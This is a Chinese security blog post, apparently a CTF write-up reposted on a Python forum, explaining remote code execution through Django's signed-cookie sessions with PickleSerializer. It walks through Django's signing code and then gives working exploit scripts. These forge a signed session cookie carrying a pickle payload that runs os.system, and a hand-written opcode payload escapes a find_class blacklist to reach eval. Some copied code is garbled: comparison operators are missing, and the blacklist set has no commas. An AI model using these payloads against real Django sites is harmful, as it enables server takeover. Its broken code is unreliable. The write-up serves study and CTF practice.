社区所有版块导航
Python
python开源   Django   Python   DjangoApp   pycharm  
DATA
docker   Elasticsearch  
aigc
aigc   chatgpt  
WEB开发
linux   MongoDB   Redis   DATABASE   NGINX   其他Web框架   web工具   zookeeper   tornado   NoSql   Bootstrap   js   peewee   Git   bottle   IE   MQ   Jquery  
机器学习
机器学习算法  
Python88.com
反馈   公告   社区推广  
产品
短视频  
印度
印度  
Py学习  »  Django

由Django-Session配置引发的反序列化安全问题

合天网安实验室 • 7 月前 • 120 次点击  

漏洞成因

漏洞成因位于目标配置文件settings.py下

关于这两个配置项

SESSION_ENGINE:

在Django中,SESSION_ENGINE 是一个设置项,用于指定用于存储和处理会话(session)数据的引擎。

SESSION_ENGINE 设置项允许您选择不同的后端引擎来存储会话数据,例如:

  1. 1. 数据库后端 (django.contrib.sessions.backends.db):会话数据存储在数据库表中。这是Django的默认会话引擎。

  2. 2. 缓存后端 (django.contrib.sessions.backends.cache):会话数据存储在缓存中,例如Memcached或Redis。这种方式适用于需要快速读写和处理大量会话数据的情况。

  3. 3. 文件系统后端 (django.contrib.sessions.backends.file):会话数据存储在服务器的文件系统中。这种方式适用于小型应用,不需要高级别的安全性和性能。

  4. 4. 签名Cookie后端 (django.contrib.sessions.backends.signed_cookies):会话数据以签名的方式存储在用户的Cookie中。这种方式适用于小型会话数据,可以提供一定程度的安全性。

  5. 5. 缓存数据库后端 (django.contrib.sessions.backends.cached_db):会话数据存储在缓存中,并且在需要时备份到数据库。这种方式结合了缓存和持久性存储的优势。

SESSION_SERIALIZER:

SESSION_SERIALIZER 是Django设置中的一个选项,用于指定Django如何对会话(session)数据进行序列化和反序列化。会话是一种在Web应用程序中用于存储用户状态信息的机制,例如用户登录状态、购物车内容、用户首选项等。

通过配置SESSION_SERIALIZER,您可以指定Django使用哪种数据序列化格式来处理会话数据。Django支持多种不同的序列化格式,包括以下常用的选项:

  1. 1. **'django.contrib.sessions.serializers.JSONSerializer'**:使用JSON格式来序列化和反序列化会话数据。JSON是一种通用的文本格式,具有良好的可读性和跨平台兼容性。

  2. 2. **'django.contrib.sessions.serializers.PickleSerializer'**:使用Python标准库中的pickle模块来序列化和反序列化会话数据。

那么上述配置项的意思就是使用cookie来存储session的签名,然后使用pickle在c/s两端进行序列化和反序列化。

紧接着看看Django中的/core/signing模块:(Django==2.2.5)

主要看看函数参数即可

key:验签中的密钥

serializer:指定序列化和反序列化类

def dumps(obj, key=None, salt='django.core.signing', serializer=JSONSerializer, compress=False):
    """
    Return URL-safe, hmac/SHA1 signed base64 compressed JSON string. If key is
    None, use settings.SECRET_KEY instead.

    If compress is True (not the default), check if compressing using zlib can
    save some space. Prepend a '.' to signify compression. This is included
    in the signature, to protect against zip bombs.

    Salt can be used to namespace the hash, so that a signed string is
    only valid for a given namespace. Leaving this at the default
    value or re-using a salt value across different parts of your
    application without good cause is a security risk.

    The serializer is expected to return a bytestring.
    """

    data = serializer().dumps(obj)  # 使用选定的类进行序列化

    # Flag for if it's been compressed or not
    is_compressed = False
    
    # 数据压缩处理
    if compress:
        # Avoid zlib dependency unless compress is being used
        compressed = zlib.compress(data)
        if len(compressed) len(data) - 1):
            data = compressed
            is_compressed = True
    base64d = b64_encode(data).decode()   # base64编码 decode转化成字符串
    if is_compressed:
        base64d = '.' + base64d
    return TimestampSigner(key, salt=salt).sign(base64d) # 返回一个签名值


# loads的过程为dumps的逆过程
def loads(s, key=None, salt='django.core.signing', serializer=JSONSerializer, max_age=None):
    """
    Reverse of dumps(), raise BadSignature if signature fails.

    The serializer is expected to accept a bytestring.
    """

    # TimestampSigner.unsign() returns str but base64 and zlib compression
    # operate on bytes.
    base64d = TimestampSigner(key, salt=salt).unsign(s, max_age=max_age).encode()
    decompress = base64d[:1] == b'.'
    if decompress:
        # It's compressed; uncompress it first
        base64d = base64d[1:]
    data = b64_decode(base64d)
    if decompress:
        data = zlib.decompress(data)
    return serializer().loads(data)

看看两个签名的类:

在Signer类中中:

class Signer:

    def __init__(self, key=None, sep=':', salt=None):
        # Use of native strings in all versions of Python
        self.key = key or settings.SECRET_KEY # key默认为settings中的配置项   
        self.sep = sep
        if _SEP_UNSAFE.match(self.sep):
            raise ValueError(
                'Unsafe Signer separator: %r (cannot be empty or consist of '
                'only A-z0-9-_=)' % sep,
            )
        self.salt = salt or '%s.%s' % (self.__class__.__module__, self.__class__.__name__)

    def signature(self, value):
        # 利用salt、value、key做一次签名
        return base64_hmac(self.salt + 'signer', value, self.key)

    def sign(self, value):
        return '%s%s%s' % (value, self.sep, self.signature(value))

    def unsign(self, signed_value):
        if self.sep not in signed_value:
            raise BadSignature('No "%s" found in value' % self.sep)
        value, sig = signed_value.rsplit(self.sep, 1)
        if constant_time_compare(sig, self.signature(value)):
            return value
        raise BadSignature('Signature "%s" does not match' % sig)

还有一个是时间戳的验签部分

class TimestampSigner(Signer):

    def timestamp(self):
        return baseconv.base62.encode(int(time.time()))

    def sign(self, value):
        value = '%s%s%s' % (value, self.sep, self.timestamp())
        return super().sign(value)

    def unsign(self, value, max_age=None):
        """
        Retrieve original value and check it wasn't signed more
        than max_age seconds ago.
        """

        result = super().unsign(value)
        value, timestamp = result.rsplit(self.sep, 1)
        timestamp = baseconv.base62.decode(timestamp)
        if max_age is not None:
            if isinstance(max_age, datetime.timedelta):
                max_age = max_age.total_seconds()
            # Check timestamp is not older than max_age
            age = time.time() - timestamp
            if age > max_age:
                raise SignatureExpired(
                    'Signature age %s > %s seconds' % (age, max_age))
        return value

时间戳主要是为了判断session是否过期,因为设置了一个max_age字段,做了差值进行比较

漏洞调试

我直接以ez_py的题目环境为漏洞调试环境(Django==2.2.5)

  • • 老惯例,先看栈帧

django/contrib/auth/middleware.py为处理Django框架中的身份验证和授权的中间件类,协助处理了HTTP请求

  • • AuthenticationMiddleware中调用了get_user用于获取session中的连接对象身份

  • • 随后调用Django auth模块下的get_user函数和_get_user_session_key函数

  • • 随后进行session的字典读取。由于加载session的过程为懒加载过程(lazy load),所以在读取SESSION_KEY的时候会进行_get_session函数运行,从而触发session的反序列化

  • • loads函数中的操作

首先先进行session是否过期的检验,随后base64解码和zlib数据解压缩,提取出python字节码

最后扔入pickle进行字节码解析

漏洞利用

首先利用条件如下:

以cookie方式存储session,实现了交互。

以Pickle为反序列化类,触发__reduce__函数的执行,实现RCE

EXP如下:

import os
import django.core.signing
import requests


# from Django.contrib.sessions.serializers.PickleSerializer
import pickle
class PickleSerializer:
    """
    Simple wrapper around pickle to be used in signing.dumps and
    signing.loads.
    """

    protocol = pickle.HIGHEST_PROTOCOL

    def dumps(self, obj):
        return pickle.dumps(obj, self.protocol)

    def loads(self, data):
        return pickle.loads(data)


SECRET_KEY = 'p(^*@36nw13xtb23vu%x)2wp-vk)ggje^sobx+*w2zd^ae8qnn'
salt = "django.contrib.sessions.backends.signed_cookies"

class exp():
    def __reduce__(self):
        # 返回一个callable 及其参数的元组
        return os.system, (('calc.exe'),)

_exp = exp()
cookie_opcodes = django.core.signing.dumps(_exp, key=SECRET_KEY, salt=salt, serializer=PickleSerializer)
print(cookie_opcodes)

resp = requests.get("http://127.0.0.1:8000/auth", cookies={"sessionid": cookie_opcodes})

Code-Breaking-Django调试

这道题是P神文章中的题目,题目源码在这:https://github.com/phith0n/code-breaking/blob/master/2018/picklecode

find_class沙盒逃逸

关于find_class:

简单来说,这是python pickle建议使用的安全策略,这个函数在pickle字节码调用c(即import)时会进行校验,校验函数由自己定义

import pickle
import io
import builtins

__all__ = ('PickleSerializer', )


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval''exec''execfile''compile''open''input''__import__''exit'}

    def find_class(self, module, name):         # python字节码解析后调用了全局类或函数 import行为 就会自动调用find_class方法
        # Only allow safe classes from builtins.
        if module == "builtins" and name not in self.blacklist:        # 检查调用的类是否为内建类, 以及函数名是否出现在黑名单内
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


class PickleSerializer():
    def dumps(self, obj):
        return pickle.dumps(obj)

    def loads(self, data):
        try:
            # 校验data是否为字符串
            if isinstance(data, str):
                raise TypeError("Can't load pickle from unicode string")
            file = io.BytesIO(data)                     # 读取data
            return RestrictedUnpickler(file,encoding='ASCII', errors='strict').load()
        except Exception as e:
            return {}

第一是要手撕python pickle opcode绕过find_class,这个过程使用到了getattr函数,这个函数有如下用法

class Person:
     def __init__(self, name):
         self.name = name

# 获取对象属性值
person = Person("Alice")
name = getattr(person, "name")
print(name)

# 调用对象方法
a = getattr(builtins, "eval")
a("print(1+1)")


# 可以设置default值
age = getattr(person, "age"30)
print(age)

builtins.getattr(builtins, "eval")("print(1+1)")

那么同理,也可以通过getattr调用eval

加载上下文:由于后端在实现时,import了一些包

(这部分包的上下文可以使用globals()函数获得)

所以可以直接导入builtins中的getattr,最终通过获取globals()中的__builtins__来获取eval等

getattr = GLOBAL('builtins', 'getattr')  # GLOBAL为导入
dict = GLOBAL('builtins', 'dict')  
dict_get = getattr(dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = globals()    
__builtins__ = dict_get(builtins, '__builtins__')   # 获取真正的__builtins__
eval = getattr(__builtins__, 'eval')
eval('__import__("os").system("calc.exe")')
return

查看Django.core.signing模块,复刻sign写exp

from django.core import signing
import pickle
import io
import builtins
import zlib
import base64

PayloadToBeEncoded = b'cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS\'get\'\ntRp2\n0cbuiltins\nglobals\np3\n0g3\n(tRp4\n0g2\n(g4\nS\'__builtins__\'\ntRp5\n0g0\n(g5\nS\'eval\'\ntRp6\n0g6\n(S\'__import__("os").system("calc.exe")\'\ntR.'

SECURE_KEY = "p(^*@36nw13xtb23vu%x)2wp-vk)ggje^sobx+*w2zd^ae8qnn"
salt = "django.contrib.sessions.backends.signed_cookies"


def b64_encode(s):
    return base64.urlsafe_b64encode(s).strip(b"=")

base64d = b64_encode(PayloadToBeEncoded).decode()

def exp(key, payload):
    global salt
    # Flag for if it's been compressed or not.
    is_compressed = False
    compress = False
    if compress:
        # Avoid zlib dependency unless compress is being used.
        compressed = zlib.compress(payload)
        if len(compressed) len(payload) - 1):
            payload = compressed
            is_compressed = True
    base64d = b64_encode(payload).decode()
    if is_compressed:
        base64d = "." + base64d
    session = signing.TimestampSigner(key=key, salt=salt).sign(base64d)
    print(session)

然后传session即可

参考

  1. 1. https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析安全相关

通过审核并发布能收获200-800元不等的稿酬。


更多详情,点我查看!

靶场实操体验,戳“阅读原文”

Python社区是高质量的Python/Django开发社区
本文地址:http://www.python88.com/topic/163389
 
120 次点击